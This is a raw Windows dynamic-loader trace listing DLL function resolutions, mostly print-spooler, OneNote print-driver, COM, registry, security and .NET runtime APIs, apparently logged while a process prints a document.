DynamicLoader: WINSPOOL.DRV/DeletePrinterDataExW
DynamicLoader: WINSPOOL.DRV/EnumPrinterKeyW
DynamicLoader: WINSPOOL.DRV/EnumPrinterDataExW
DynamicLoader: WINSPOOL.DRV/GetPrinterDataExW
DynamicLoader: WINSPOOL.DRV/SetPrinterDataExW
DynamicLoader: WINSPOOL.DRV/DeletePrinterDataW
DynamicLoader: WINSPOOL.DRV/EnumPrinterDataW
DynamicLoader: WINSPOOL.DRV/SpoolerPrinterEvent
DynamicLoader: WINSPOOL.DRV/SetPortW
DynamicLoader: WINSPOOL.DRV/DocumentPropertySheets
DynamicLoader: WINSPOOL.DRV/DevicePropertySheets
DynamicLoader: WINSPOOL.DRV/IsValidDevmodeW
DynamicLoader: WINSPOOL.DRV/IsValidDevmodeA
DynamicLoader: WINSPOOL.DRV/AddPortExW
DynamicLoader: WINSPOOL.DRV/DeletePrintProvidorW
DynamicLoader: WINSPOOL.DRV/AddPrintProvidorW
DynamicLoader: WINSPOOL.DRV/DeletePrintProcessorW
DynamicLoader: WINSPOOL.DRV/DeleteMonitorW
DynamicLoader: WINSPOOL.DRV/AddMonitorW
DynamicLoader: WINSPOOL.DRV/StartDocDlgW
DynamicLoader: WINSPOOL.DRV/AdvancedDocumentPropertiesW
DynamicLoader: WINSPOOL.DRV/AdvancedDocumentPropertiesA
DynamicLoader: WINSPOOL.DRV/DocumentPropertiesW
DynamicLoader: WINSPOOL.DRV/DeviceCapabilitiesW
DynamicLoader: WINSPOOL.DRV/DeletePrinterIC
DynamicLoader: WINSPOOL.DRV/PlayGdiScriptOnPrinterIC
DynamicLoader: WINSPOOL.DRV/CreatePrinterIC
DynamicLoader: WINSPOOL.DRV/SetJobW
DynamicLoader: WINSPOOL.DRV/GetJobW
DynamicLoader: WINSPOOL.DRV/EnumJobsW
DynamicLoader: WINSPOOL.DRV/AddPrinterW
DynamicLoader: WINSPOOL.DRV/SetPrinterW
DynamicLoader: WINSPOOL.DRV/GetPrinterDriverW
DynamicLoader: WINSPOOL.DRV/GetPrinterDriverDirectoryW
DynamicLoader: WINSPOOL.DRV/EnumPrintersW
DynamicLoader: WINSPOOL.DRV/AddPrinterConnectionW
DynamicLoader: WINSPOOL.DRV/DeletePrinterConnectionW
DynamicLoader: WINSPOOL.DRV/AddPrinterDriverExW
DynamicLoader: WINSPOOL.DRV/AddPrinterDriverExA
DynamicLoader: WINSPOOL.DRV/EnumPrinterDriversW
DynamicLoader: WINSPOOL.DRV/DeletePrinterDriverW
DynamicLoader: WINSPOOL.DRV/DeletePrinterDriverExW
DynamicLoader: WINSPOOL.DRV/AddPrintProcessorW
DynamicLoader: WINSPOOL.DRV/EnumPrintProcessorsW
DynamicLoader: WINSPOOL.DRV/GetPrintProcessorDirectoryW
DynamicLoader: WINSPOOL.DRV/EnumPrintProcessorDatatypesW
DynamicLoader: WINSPOOL.DRV/
DynamicLoader: WINSPOOL.DRV/
DynamicLoader: WINSPOOL.DRV/
DynamicLoader: WINSPOOL.DRV/
DynamicLoader: WINSPOOL.DRV/SplDriverUnloadComplete
DynamicLoader: WINSPOOL.DRV/
DynamicLoader: WINSPOOL.DRV/
DynamicLoader: WINSPOOL.DRV/OpenPrinterW
DynamicLoader: WINSPOOL.DRV/OpenPrinterA
DynamicLoader: WINSPOOL.DRV/ResetPrinterW
DynamicLoader: WINSPOOL.DRV/StartDocPrinterW
DynamicLoader: WINSPOOL.DRV/FlushPrinter
DynamicLoader: WINSPOOL.DRV/GetPrinterDataW
DynamicLoader: WINSPOOL.DRV/SetPrinterDataW
DynamicLoader: WINSPOOL.DRV/AddJobW
DynamicLoader: WINSPOOL.DRV/ScheduleJob
DynamicLoader: WINSPOOL.DRV/WaitForPrinterChange
DynamicLoader: WINSPOOL.DRV/FindNextPrinterChangeNotification
DynamicLoader: WINSPOOL.DRV/PrinterMessageBoxW
DynamicLoader: WINSPOOL.DRV/ClosePrinter
DynamicLoader: WINSPOOL.DRV/AddFormW
DynamicLoader: WINSPOOL.DRV/DeleteFormW
DynamicLoader: WINSPOOL.DRV/GetFormW
DynamicLoader: WINSPOOL.DRV/SetFormW
DynamicLoader: WINSPOOL.DRV/EnumFormsW
DynamicLoader: WINSPOOL.DRV/EnumPortsW
DynamicLoader: WINSPOOL.DRV/EnumMonitorsW
DynamicLoader: WINSPOOL.DRV/AddPortW
DynamicLoader: WINSPOOL.DRV/ConfigurePortW
DynamicLoader: WINSPOOL.DRV/DeletePortW
DynamicLoader: WINSPOOL.DRV/GetPrinterW
DynamicLoader: WINSPOOL.DRV/DeletePrinterDriverPackageW
DynamicLoader: WINSPOOL.DRV/
DynamicLoader: WINSPOOL.DRV/
DynamicLoader: GDI32.dll/GdiPrinterThunk
DynamicLoader: RpcRtRemote.dll/I_RpcExtInitializeExtensionPoint
DynamicLoader: secur32.dll/InitSecurityInterfaceW
DynamicLoader: cryptsp.dll/SystemFunction035
DynamicLoader: WINSPOOL.DRV/DocumentPropertySheets
DynamicLoader: RPCRT4.dll/NdrClientCall3
DynamicLoader: RPCRT4.dll/RpcStringBindingComposeW
DynamicLoader: RPCRT4.dll/RpcBindingFromStringBindingW
DynamicLoader: RPCRT4.dll/RpcBindingSetAuthInfoExW
DynamicLoader: sechost.dll/LookupAccountNameLocalW
DynamicLoader: RPCRT4.dll/RpcStringFreeW
DynamicLoader: RPCRT4.dll/RpcBindingFree
DynamicLoader: unidrvui.dll/DrvResetConfigCache
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: WINSPOOL.DRV/DocumentPropertySheets
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDeviceCapabilities
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDeviceCapabilities
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDeviceCapabilities
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDeviceCapabilities
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDeviceCapabilities
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDeviceCapabilities
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: WINSPOOL.DRV/DocumentPropertySheets
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: WINSPOOL.DRV/StartDocDlgW
DynamicLoader: WINSPOOL.DRV/OpenPrinterW
DynamicLoader: WINSPOOL.DRV/ResetPrinterW
DynamicLoader: WINSPOOL.DRV/ClosePrinter
DynamicLoader: WINSPOOL.DRV/GetPrinterW
DynamicLoader: WINSPOOL.DRV/GetPrinterDriverW
DynamicLoader: WINSPOOL.DRV/EndDocPrinter
DynamicLoader: WINSPOOL.DRV/EndPagePrinter
DynamicLoader: WINSPOOL.DRV/ReadPrinter
DynamicLoader: WINSPOOL.DRV/StartDocPrinterW
DynamicLoader: WINSPOOL.DRV/StartPagePrinter
DynamicLoader: WINSPOOL.DRV/AbortPrinter
DynamicLoader: WINSPOOL.DRV/DocumentEvent
DynamicLoader: WINSPOOL.DRV/QuerySpoolMode
DynamicLoader: WINSPOOL.DRV/QueryRemoteFonts
DynamicLoader: WINSPOOL.DRV/SeekPrinter
DynamicLoader: WINSPOOL.DRV/QueryColorProfile
DynamicLoader: WINSPOOL.DRV/SplDriverUnloadComplete
DynamicLoader: WINSPOOL.DRV/DocumentPropertiesW
DynamicLoader: WINSPOOL.DRV/
DynamicLoader: WINSPOOL.DRV/IsValidDevmodeW
DynamicLoader: WINSPOOL.DRV/GetSpoolFileHandle
DynamicLoader: WINSPOOL.DRV/CommitSpoolData
DynamicLoader: WINSPOOL.DRV/CloseSpoolFileHandle
DynamicLoader: WINSPOOL.DRV/
DynamicLoader: unidrvui.dll/DrvDocumentEvent
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentEvent
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: mxdwdrv.dll/DrvEnableDriver
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: FontSub.dll/CreateFontPackage
DynamicLoader: unidrvui.dll/MxdcGetPDEVAdjustment
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: WINSPOOL.DRV/DocumentPropertySheets
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: WINSPOOL.DRV/DocumentPropertySheets
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDeviceCapabilities
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDeviceCapabilities
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDeviceCapabilities
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: WINSPOOL.DRV/DocumentPropertySheets
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: FontSub.dll/CreateFontPackage
DynamicLoader: unidrvui.dll/MxdcGetPDEVAdjustment
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: prntvpt.dll/PTOpenProvider
DynamicLoader: prntvpt.dll/PTCloseProvider
DynamicLoader: prntvpt.dll/PTConvertDevModeToPrintTicket
DynamicLoader: WINSPOOL.DRV/DocumentPropertySheets
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: WINSPOOL.DRV/DocumentPropertySheets
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDeviceCapabilities
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentEvent
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentEvent
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: FontSub.dll/CreateFontPackage
DynamicLoader: unidrvui.dll/MxdcGetPDEVAdjustment
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: WINSPOOL.DRV/DocumentPropertySheets
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: WINSPOOL.DRV/DocumentPropertySheets
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentEvent
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentEvent
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: FontSub.dll/CreateFontPackage
DynamicLoader: unidrvui.dll/MxdcGetPDEVAdjustment
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: WINSPOOL.DRV/DocumentPropertySheets
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: WINSPOOL.DRV/DocumentPropertySheets
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: unidrvui.dll/DrvDocumentPropertySheets
DynamicLoader: SendToOneNoteUI.DLL/DllGetClassObject
DynamicLoader: SendToOneNoteUI.DLL/DllCanUnloadNow
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/DPA_Create
DynamicLoader: comctl32.dll/DPA_InsertPtr
DynamicLoader: comctl32.dll/DPA_DeletePtr
DynamicLoader: comctl32.dll/DPA_Search
DynamicLoader: kernel32.dll/RegCreateKeyExW
DynamicLoader: ntdll.dll/EtwRegisterTraceGuidsW
DynamicLoader: ntdll.dll/EtwRegisterTraceGuidsW
DynamicLoader: kernel32.dll/SortGetHandle
DynamicLoader: kernel32.dll/SortCloseHandle
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: ntmarta.dll/GetMartaExtensionInterface
DynamicLoader: sechost.dll/LookupAccountNameLocalW
DynamicLoader: ADVAPI32.dll/LookupAccountSidW
DynamicLoader: sechost.dll/LookupAccountSidLocalW
DynamicLoader: CRYPTSP.dll/CryptAcquireContextW
DynamicLoader: CRYPTSP.dll/CryptGenRandom
DynamicLoader: RpcRtRemote.dll/I_RpcExtInitializeExtensionPoint
DynamicLoader: ole32.dll/CoGetClassObject
DynamicLoader: ole32.dll/CoGetMarshalSizeMax
DynamicLoader: ole32.dll/CoMarshalInterface
DynamicLoader: ole32.dll/CoUnmarshalInterface
DynamicLoader: ole32.dll/StringFromIID
DynamicLoader: ole32.dll/CoGetPSClsid
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: ole32.dll/CoReleaseMarshalData
DynamicLoader: ole32.dll/DcomChannelSetHResult
DynamicLoader: ole32.dll/CoGetMarshalSizeMax
DynamicLoader: ole32.dll/CoMarshalInterface
DynamicLoader: ole32.dll/CoUnmarshalInterface
DynamicLoader: ole32.dll/CoReleaseMarshalData
DynamicLoader: wbemsvc.dll/DllGetClassObject
DynamicLoader: wbemsvc.dll/DllCanUnloadNow
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: kernel32.dll/RegOpenKeyExW
DynamicLoader: kernel32.dll/RegQueryValueExW
DynamicLoader: kernel32.dll/RegCloseKey
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: sechost.dll/LookupAccountSidLocalW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ADVAPI32.dll/RegOpenKeyW
DynamicLoader: kernel32.dll/GetThreadPreferredUILanguages
DynamicLoader: kernel32.dll/SetThreadPreferredUILanguages
DynamicLoader: kernel32.dll/LocaleNameToLCID
DynamicLoader: kernel32.dll/GetLocaleInfoEx
DynamicLoader: kernel32.dll/LCIDToLocaleName
DynamicLoader: kernel32.dll/GetSystemDefaultLocaleName
DynamicLoader: ADVAPI32.dll/LsaEnumerateTrustedDomains
DynamicLoader: ADVAPI32.dll/LsaQueryInformationPolicy
DynamicLoader: ADVAPI32.dll/LsaNtStatusToWinError
DynamicLoader: ADVAPI32.dll/LsaFreeMemory
DynamicLoader: ADVAPI32.dll/LsaOpenPolicy
DynamicLoader: ADVAPI32.dll/LsaClose
DynamicLoader: ADVAPI32.dll/QueryServiceStatusEx
DynamicLoader: ADVAPI32.dll/DuplicateTokenEx
DynamicLoader: ADVAPI32.dll/SetSecurityDescriptorControl
DynamicLoader: ADVAPI32.dll/ConvertToAutoInheritPrivateObjectSecurity
DynamicLoader: ADVAPI32.dll/DestroyPrivateObjectSecurity
DynamicLoader: ADVAPI32.dll/CheckTokenMembership
DynamicLoader: ADVAPI32.dll/AddAccessAllowedObjectAce
DynamicLoader: ADVAPI32.dll/AddAccessDeniedObjectAce
DynamicLoader: ADVAPI32.dll/AddAuditAccessObjectAce
DynamicLoader: ADVAPI32.dll/SetNamedSecurityInfoW
DynamicLoader: ADVAPI32.dll/GetNamedSecurityInfoW
DynamicLoader: ADVAPI32.dll/SetNamedSecurityInfoExW
DynamicLoader: ADVAPI32.dll/GetExplicitEntriesFromAclW
DynamicLoader: ADVAPI32.dll/GetEffectiveRightsFromAclW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ADVAPI32.dll/LookupAccountSidW
DynamicLoader: userenv.dll/DestroyEnvironmentBlock
DynamicLoader: userenv.dll/CreateEnvironmentBlock
DynamicLoader: sechost.dll/ConvertSidToStringSidW
DynamicLoader: SspiCli.dll/GetUserNameExW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/StringFromCLSID
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: OLEAUT32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ntdll.dll/EtwUnregisterTraceGuids
DynamicLoader: ntdll.dll/EtwUnregisterTraceGuids
DynamicLoader: CRYPTSP.dll/CryptReleaseContext
DynamicLoader: CRYPTBASE.dll/SystemFunction036
DynamicLoader: ole32.dll/CoCreateInstance
DynamicLoader: shell32.dll/
DynamicLoader: ole32.dll/CoGetApartmentType
DynamicLoader: ole32.dll/CoRegisterInitializeSpy
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: comctl32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: ole32.dll/CoGetMalloc
DynamicLoader: ole32.dll/CoInitializeEx
DynamicLoader: ole32.dll/CreateBindCtx
DynamicLoader: ole32.dll/CoTaskMemAlloc
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: ADVAPI32.dll/RegEnumKeyW
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ADVAPI32.dll/InitializeSecurityDescriptor
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_Size_ExW
DynamicLoader: ADVAPI32.dll/SetEntriesInAclW
DynamicLoader: SETUPAPI.dll/CM_Get_Device_Interface_List_ExW
DynamicLoader: ntmarta.dll/GetMartaExtensionInterface
DynamicLoader: ADVAPI32.dll/SetSecurityDescriptorDacl
DynamicLoader: ADVAPI32.dll/IsTextUnicode
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: shell32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: ole32.dll/CoUninitialize
DynamicLoader: ole32.dll/CoGetMalloc
DynamicLoader: ole32.dll/CoTaskMemFree
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: comctl32.dll/
DynamicLoader: ntdll.dll/RtlDllShutdownInProgress
DynamicLoader: propsys.dll/PSCreateMemoryPropertyStore
DynamicLoader: sechost.dll/ConvertSidToStringSidW
DynamicLoader: profapi.dll/
DynamicLoader: LINKINFO.dll/CreateLinkInfoW
DynamicLoader: USER32.dll/IsCharAlphaW
DynamicLoader: USER32.dll/CharPrevW
DynamicLoader: ntshrui.dll/GetNetResourceFromLocalPathW
DynamicLoader: srvcli.dll/NetShareEnum
DynamicLoader: cscapi.dll/CscNetApiGetInterface
DynamicLoader: slc.dll/SLGetWindowsInformationDWORD
DynamicLoader: SHLWAPI.dll/PathRemoveFileSpecW
DynamicLoader: LINKINFO.dll/DestroyLinkInfo
DynamicLoader: propsys.dll/PropVariantToBoolean
DynamicLoader: ole32.dll/PropVariantClear
DynamicLoader: CRYPTSP.dll/CryptAcquireContextW
DynamicLoader: CRYPTSP.dll/CryptGenRandom
DynamicLoader: CRYPTSP.dll/CryptReleaseContext
DynamicLoader: ole32.dll/CoRevokeInitializeSpy
DynamicLoader: comctl32.dll/
DynamicLoader: OLEAUT32.dll/
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryInfoKeyW
DynamicLoader: ADVAPI32.dll/RegEnumKeyExW
DynamicLoader: ADVAPI32.dll/RegEnumValueW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: mscoree.dll/
DynamicLoader: ADVAPI32.dll/RegOpenKeyExW
DynamicLoader: ADVAPI32.dll/RegQueryValueExW
DynamicLoader: ADVAPI32.dll/RegCloseKey
DynamicLoader: mscoreei.dll/RegisterShimImplCallback
DynamicLoader: mscoreei.dll/RegisterShimImplCleanupCallback
DynamicLoader: mscoreei.dll/SetShellShimInstance
DynamicLoader: mscoreei.dll/OnShimDllMainCalled
DynamicLoader: mscoreei.dll/CorBindToRuntimeEx_RetAddr
DynamicLoader: mscoreei.dll/CorBindToRuntimeEx
DynamicLoader: SHLWAPI.dll/UrlIsW
DynamicLoader: kernel32.dll/GetCurrentPackageId
DynamicLoader: kernel32.dll/InitializeCriticalSectionAndSpinCount
DynamicLoader: msvcrt.dll/_set_error_mode
DynamicLoader: msvcrt.dll/?set_terminate@@YAP6AXXZP6AXXZ@Z
DynamicLoader: msvcrt.dll/_get_terminate
DynamicLoader: kernel32.dll/FindActCtxSectionStringW
DynamicLoader: kernel32.dll/GetSystemWindowsDirectoryW
DynamicLoader: mscoree.dll/GetProcessExecutableHeap
DynamicLoader: mscoreei.dll/GetProcessExecutableHeap_RetAddr
DynamicLoader: mscoreei.dll/GetProcessExecutableHeap
DynamicLoader: mscorwks.dll/SetLoadedByMscoree
DynamicLoader: mscorwks.dll/DllGetClassObjectInternal
DynamicLoader: mscorwks.dll/GetCLRFunction
DynamicLoader: ADVAPI32.dll/RegisterTraceGuidsW
DynamicLoader: ADVAPI32.dll/UnregisterTraceGuids
DynamicLoader: ADVAPI32.dll/GetTraceLoggerHandle
DynamicLoader: ADVAPI32.dll/GetTraceEnableLevel
DynamicLoader: ADVAPI32.dll/GetTraceEnableFlags
DynamicLoader: ADVAPI32.dll/TraceEvent
DynamicLoader: mscoree.dll/IEE
DynamicLoader: mscoreei.dll/IEE_RetAddr
DynamicLoader: mscoreei.dll/IEE
